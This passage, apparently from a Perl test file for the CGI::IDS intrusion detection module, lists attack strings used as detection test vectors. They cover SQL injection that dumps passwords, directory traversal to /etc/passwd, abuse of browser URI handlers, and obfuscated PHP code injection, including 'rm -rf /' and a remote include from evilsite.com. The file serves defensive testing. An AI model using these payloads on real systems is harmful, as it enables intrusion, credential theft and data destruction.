CGI-IDS
1 => "asd'; select null,password,null from users; ",
2 => "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor ",
3 => "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b
where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user
OPEN tablecursor FETCH NEXT FROM tablecursor INTO \@a,\@b WHILE(\@a != null)
\@query = null+null+null+null+ ' UPDATE '+null+\@a+null+ ' SET id=null,\@b = \@payload'
BEGIN EXEC sp_executesql \@query
FETCH NEXT FROM tablecursor INTO \@a,\@b END
CLOSE tablecursor DEALLOCATE tablecursor;
and some text, to get pass the centrifuge; and some more text.",
4 => "\@query = null+null+null+ ' UPDATE '+null+\@a+ ' SET[ '+null+\@b+ ' ] = \@payload'",
5 => "asd' union distinct(select null,password,null from users)--a ",
6 => "asd' union distinct ( select null,password,(null)from user )-- a ",
7 => "'DECLARE%20\@S%20CHAR(4000);SET%20\@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6...
8 => "asaa';SELECT[asd]FROM[asd]",
9 => "asd'; select [column] from users ",
10 => "0x31 union select @"."@"."version,username,password from users ",
11 => "1 order by if(1<2 ,uname,uid) ",
12 => "1 order by ifnull(null,userid) ",
13 => "2' between 1 and 3 or 0x61 like 'a",
14 => "4' MOD 2 like '0",
15 => "-1' /ID having 1< 1 and 1 like 1/'1 ",
16 => "2' / 0x62 or 0 like binary '0",
17 => "0' between 2-1 and 4-1 or 1 sounds like binary '1 ",
18 => "-1' union ((select (select user),(select password),1/1 from mysql.user)) order by '1 ",
19 => "-1' or substring(null/null,1/null,1) or '1",
20 => "1' and 1 = hex(null-1 or 1) or 1 /'null ",
21 => "AND CONNECTION_ID()=CONNECTION_ID()",
22 => "AND ISNULL(1/0)",
23 => "MID(\@\@hostname, 1, 1)",
24 => "CHARSET(CURRENT_USER())",
25 => "DATABASE() LIKE SCHEMA()",
26 => "COERCIBILITY(USER())",
27 => "1' and 0x1abc like 0x88 or '0",
28 => "'-1-0 union select (select `table_name` from `information_schema`.tables limit 1) and '1",
29 => "null''null' find_in_set(uname, 'lightos' ) and '1",
30 => "(case-1 when mid(load_file(0x61616161),12, 1/ 1)like 0x61 then 1 else 0 end) ",
31 => CGI::IDS::urldecode('%27sounds%20like%281%29%20union%19%28select%191,group_concat%28table_name%29,3%19from%19information_schema.%60tables%60%29%23%28'),
32 => "0' '1' like (0) and 1 sounds like a or true#1",
);
# Detection test vectors for path / directory traversal style input.
# "DT" presumably stands for "directory traversal" (the PHPIDS `dt` filter
# tag) -- confirm against the filter set shipped with the distribution.
# Keys are plain sequence numbers; values are the raw request strings.
# How the vectors are submitted to the detector is not visible in this excerpt.
#
# Keep every value byte-exact: the percent-encoding depth, the trailing %00
# and the trailing spaces are what the individual cases exercise. All values
# are single-quoted, so Perl only collapses \\ to \ and \' to '; nothing is
# interpolated or URL-decoded at this point.
my %testDTList = (
# 0-2: plain relative traversal, a Windows environment-variable path, and a
# command separator followed by shell wildcards in place of literal path names.
0 => '../../etc/passwd',
1 => '\\\%windir%\\\cmd.exe',
2 => '1;cat /e*c/p*d',
# 3-5: percent-encoded separators. %25 is an encoded "%", so %25%5c only
# becomes a backslash after two decoding passes; %2e is ".".
3 => '%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00',
4 => '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
5 => '/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini',
6 => 'C:\\boot.ini',
# 7: encoded NUL (%00) appended after the file name.
7 => '../../../../../../../../../../../../localstart.asp%00',
8 => '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini',
# 9: server-side-include exec directive rather than a bare path.
9 => '<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->',
10 => '../../../../../../../../conf/server.xml',
# 11: %c0%ae is the overlong two-byte UTF-8 form of ".", so the check must
# not depend on a strict UTF-8 decoder having rejected it first.
11 => '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd',
# 12: "..././" still contains "../" after a single non-recursive removal of
# "../"; the value ends in a space that is part of the test input.
12 => 'dir/..././..././folder/file.php ',
);
# Detection test vectors built on application-registered URI schemes
# (firefoxurl:, aim:, navigatorurl:, res:, mailto:). Each value embeds quote
# characters followed by what look like command-line switches, script URLs or
# executable paths, i.e. input aimed at the program that handles the scheme
# rather than at the web application itself.
# Keys are plain sequence numbers. How the vectors are submitted to the
# detector is not visible in this excerpt.
#
# Values are single-quoted: \' is a literal apostrophe and \\ a literal
# backslash; every other backslash (e.g. in c:\windows) is kept as written.
my %testURIList = (
0 => 'firefoxurl:test|"%20-new-window%20file:\c:/test.txt',
1 => 'firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"',
2 => 'aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"',
# NOTE(review): entry 3 is cut off with "..." in this listing, so its closing
# quote is missing here; take the complete value from the distribution's own
# test file before running this code.
3 => 'navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+...
4 => 'res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210',
5 => 'mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat',
);
# Detection test vectors consisting of PHP (and shell) code fragments.
# "RFE" presumably stands for "remote file execution" (the PHPIDS `rfe`
# filter tag) -- confirm against the filter set shipped with the distribution.
# Keys are plain sequence numbers. How the vectors are submitted to the
# detector is not visible in this excerpt.
#
# The values are data only: nothing in this hash should ever reach eval,
# system, backticks or a PHP interpreter. Almost all entries are
# single-quoted, so "$_a", "$_SERVER" and the backticks inside them are
# literal text, not Perl variables or Perl command execution. Several values
# span multiple source lines; their embedded newlines are part of the input.
my %testRFEList = (
0 => ';phpinfo()',
1 => '@phpinfo()',
2 => '"; <?php exec("rm -rf /"); ?>',
3 => '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');',
4 => ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))',
5 => '; include "http://evilsite.com/evilcode"',
# 6 is the one double-quoted entry: "\0" is a real NUL byte at the end of
# the value. Changing the quoting style would change the test input.
6 => "; rm -rf /\0",
# 7-17: the PHP function name is assembled at run time (concatenation, XOR
# against a constant, str_rot13, strrev, base64_decode, str_replace,
# strtolower, array slots) instead of being spelled out, so these cases check
# that detection does not depend on matching a literal function name.
7 => '"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="',
8 => '";
define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ;
if ( !0) $c = USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC ^ _a;
if ( !0) system($c) ;//',
9 => '" ; //
if (!0) $_a ="". str_rot13(\'cevags\'); //
$_b = HTTP_USER_AGENT; //
$_c="". $_SERVER[$_b]; //
$_a( `$_c` );//',
10 => '"; //
$_c = "" . $_a($b);
$_b(`$_c`);//',
11 => '" ; //
if (!0) $_a = base64_decode ;
if (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp");
if (!0) $_d = QUERY_STRING; //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//',
12 => '" ; //
$_y = "" . strrev("ftnirp");
if (!0) $_a = base64_decode ;
if (!0) $_b="" . $_a(\'cHdk\');
if (!0) $_y(`$_b`);//',
13 => '";{ if (true) $_a = "" . str_replace(\'!\',\'\',\'s!y!s!t!e!m!\');
$_a( "dir"); } //',
14 => '";{ if (true) $_a = "" . strtolower("pass");
if (1) $_a.= "" . strtolower("thru");
$_a( "dir"); } //',
15 => '";{if (!($_b[]++%1)) $_a[] = system;
$_a[0]( "ls"); } //',
16 => '";{if (pi) $_a[] = system;
$_a[0]( "ls"); } //',
17 => '";; //
if (!($_b[] %1)) $_a[0] = system;
$_a[0](!a. "ls"); //',
18 => '; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//',
# 19: the URL scheme is written as "hxxp" in the source, so the value does
# not contain a fetchable http:// URL.
19 => 'aaaa { $ {`wget hxxp://example.com/x.php`}}',
);
my %testUTF7List = (
0 => '+alert(1)',
1 => 'ACM=1,1+eval(1+name+(+ACM-1),ACM)',
2 => '1+eval(1+name+(+1-1),-1)',